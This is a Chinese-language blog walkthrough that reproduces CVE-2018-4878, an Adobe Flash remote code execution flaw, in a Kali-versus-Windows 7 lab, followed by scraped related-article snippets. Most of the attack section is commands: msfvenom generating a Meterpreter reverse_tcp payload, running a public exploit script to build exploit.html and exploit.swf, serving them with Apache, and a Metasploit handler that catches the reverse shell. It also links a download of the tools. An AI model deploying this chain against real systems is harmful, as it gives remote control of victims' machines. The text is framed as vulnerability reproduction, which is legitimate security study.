Adobe Flash cve-2018-4878 的漏洞复现

漏洞概述
2018年2月1日, Adobe官方发布了Adobe Flash Player系列产品的安全通告(APSA18-01),该0day漏洞编号为CVE-2018-4878,目前最新版本28.0.0.137及其以前版本的Adobe Flash Player均受漏洞影响,Adobe官方于2月5日发布此漏洞补丁。
攻击者可以将恶意Flash文件嵌入Office文档,网页,或者桌面应用,当用户打开时便会收到攻击
此次复现为网页链接的方式进行复现受害者访问我们的flash链接就会被远程代码执行并且直接被getshell
攻击主机:Kali linux ip:172.16.221.213
受害者主机 window7 ip:172.16.221.247
实验用到的工具会在文章末尾分享
攻击主机配置
1.首先解压我们用到的文件
unzip CVE-2018-4878-master.zip

2.用msfvenom生成shell代码
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.221.213 LPORT=4444 -f python > code.txt
-p –payload < payload> 指定需要使用的payload
windows/meterpreter/reverse_tcp 我们选择使用的攻击载荷
LHOST指定ip地址
LPORT指定监听的端口可任意更改
-f –format < format> 指定输出格式 (使用 –help-formats 来获取msf支持的输出格式列表)

(1)查看代码文件
cat code.txt

(2)进入到我们解压用到的文件目录,编辑cve-2018-4878.py文件

修改下面的文件路径

    别忘了保存修改并退出

3.python执行脚本文件
python cve-2017-4878-master.py

ls 查看到生成了两个文件
4.启动Apache服务
(1)service apache2 start
我们可以看到已经启动成功了
(2)将我们上两个文件复制到apache2服务的网页目录
cp exlpoit.html /var/www/html/exploit.html
cp exploit.swf /var/www/html/exploit.swf

现在我们的攻击环境基本配置完成,只要受害者访问我的链接就可以直接被远程控制
5.启动armitage:属于图形化的metasploit也方便演示

(1)使用handler监听模块
use exploit/multi/handler
(2)设置攻击载荷是我们在生成文件的时候所选择的攻击载荷
set payload windows/meterpreter/reverse_tcp

set lhost 172.16.221.213 设置攻击主机的ip
set lport 4444 设置监听端口为4444(我们在用msfvenom生成代码文件是设置的端口)
6.开启监听
exploit

7.windows7安装Adobeflash 28.0 后用浏览器访问http://172.16.221.213/exploit.html

8.此时我们可以看到Kali linux已经获取到sessions

复现完成,此时我们就可以查看一下系统配置

当然你也可以不用此图形化直接用命令行(命令都是一样的)
msfconsole 启动


顺便用shell查看下ip地址
在真实环境下,很多黑客会基于社会工程学诱导用户点击来达到黑客的目的,也希望大家小心陌生链接及时升级安全补丁,以免造成损失
工具链接:链接:https://pan.baidu.com/s/1kGmB2eZWf9PBFeXzyxOnkg 密码:ut52

原文地址:http://blog.51cto.com/superwolf/2116897

时间: 2024-10-19 22:18:33

Adobe Flash cve-2018-4878 的漏洞复现的相关文章

解决浏览器Adobe Flash Player不是最新版本问题

方法/步骤 首先打开浏览器,登录网址[http://www.adobe.com/cn/],步骤截图如下所示:   点击[菜单],下拉打开的列表,找到并点击[Adobe Flash Player],步骤截图如下所示:   点击页面上的[您是否有其他操作系统或浏览器?]按钮,步骤截图如下所示:   根据自己的情况,先选择操作系统,需要注意的是,在选择Adobe Flash Player的版本时,一定要看准,要选择PPAPI版本的,现在谷歌浏览器已经停止支持NPAPI版本的插件了. 特别提醒,注意把那

[漏洞复现] CVE-2018-4878 Flash 0day

1.漏洞概述 2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878). 攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被"远程代码执行",并且直接被getshell. 直到2018年2月5号,Adboe才发布补丁来修复此0 day漏洞. 互联网上出现的基于此Flash 0day漏洞进行攻击的样本,其实在2017年底就

Adobe Animate CC 2018中文破解版 64位(附破解补丁)

Animate CC 2018破解版:http://www.3322.cc/soft/35163.htmlAnimate CC 2018破解版(原Adobe Flash Professional CC)是Adobe公司推出的一款二维动画软件,主要用于设计和编辑Flash文档,新版在维持原有Flash开发工具外(虽然现在已经没有人使用FLASH来制作网站,但目前几乎所有的网页在线广告还是依然采用Flash来制作),还新增HTML 5创作工具,可为网页开发者提供更适应现有网页应用的音频.图片.视频.

Adobe Flash Player 32.0 插件离线安装包下载(无需联网安装)

网上很多人声称并提供的flash离线安装包是需要联网才能安装成功的,其实就是在线安装包,而这里提供的是真正的离线安装包,无需联网即可安装成功. 点击下面地址下载离线安装包: Adobe Flash Player 32.0.0.156 for IE   提取码:gs7l Adobe Flash Player 32.0.0.156 for Firefox   提取码:x8ti Adobe Flash Player 32.0.0.156 for Opera&Chrome   提取码:jfwz Adob

像烟瘾一样的Adobe Flash,真的戒不掉吗?

近来对Adobe Flash来说真是段难过的日子.Hacking Team公司外泄的440GB电子邮件数据已成为黑客挖掘安全漏洞的宝藏. 光是Flash就被发现了三个不同的漏洞: l  CVE-2015-5119 l  CVE-2015-5122 l  CVE-2015-5123 Flash一直是信息安全的梦魇.多年来,趋势科技已经报导过各种Flash的漏洞,每一次.除了小心避开一些不良站点.停用Flash插件.然后等待Adobe公布更新之外,用户能做的事实上非常有限. 因 Hacking Te

企业IT管理员IE11升级指南【2】—— Internet Explorer 11 对Adobe Flash的支持

Internet Explorer 11 对Adobe Flash的支持 在Windows 8.1上,Adobe Flash被作为一个平台功能包括在内,可运行于Internet Explorer和桌面版Internet Explorer.用户可使用“管理加载项”对话框启用或关闭此功能. 同时管理员也可以使用组策略设置“在Internet Explorer中关闭Adobe Flash,阻止应用程序使用Internet Explorer技术实例化Flash对象”启用或关闭此功能. GPO设置路径:

8.Structs 2-057漏洞复现

漏洞信息: 定义XML配置时如果namespace值未设置且上层动作配置(Action Configuration)中未设置或用通配符namespace时可能会导致远程代码执行. url标签未设置value和action值且上层动作未设置或用通配符namespace时可能会导致远程代码执行. 官方解决方案: 升级至版本2.3.35或2.5.17.这两个版本仅仅只是更新了安全补丁,不存在兼容性问题. 临时解决方案: 推荐用户及时更新,但如果不想更新,可暂时使用官方提供的临时解决方案:当上层动作配置

Ecshop 2.x_3.x SQL注入和代码执行漏洞复现和分析

0x00 前言 问题发生在user.php的的显示函数,模版变量可控,导致注入,配合注入可达到远程代码执行 0x01 漏洞分析 1.SQL注入 先看user.php的$ back_act变量来源于HTTP_REFERER,我们可控. 分配函数用于在模版变量里赋值 再看显示函数, 读取user_passport.dwt模版文件内容,显示解析变量后的HTML内容,用_echash做分割,得到$?然后交给isnert_mod处理,由于_echash是默认的,不是随机生成的,所以$ VAL内容可随意控制

[提权]CVE-2018-8120漏洞复现

0x01 漏洞名称 Windows操作系统Win32k的内核提权漏洞 0x02 漏洞编号 CVE-2018-8120 0x03 漏洞描述 部分版本Windows系统win32k.sys组件的NtUserSetImeInfoEx()系统服务函数内部未验证内核对象中的空指针对象,普通应用程序可利用该空指针漏洞以内核权限执行任意代码 0x04 影响版本 以下软件版本受到影响.未列出的版本要么超过其支持生命周期,要么不受影响.要确定软件版本或版本的支持生命周期,请查阅Microsoft支持生命周期. W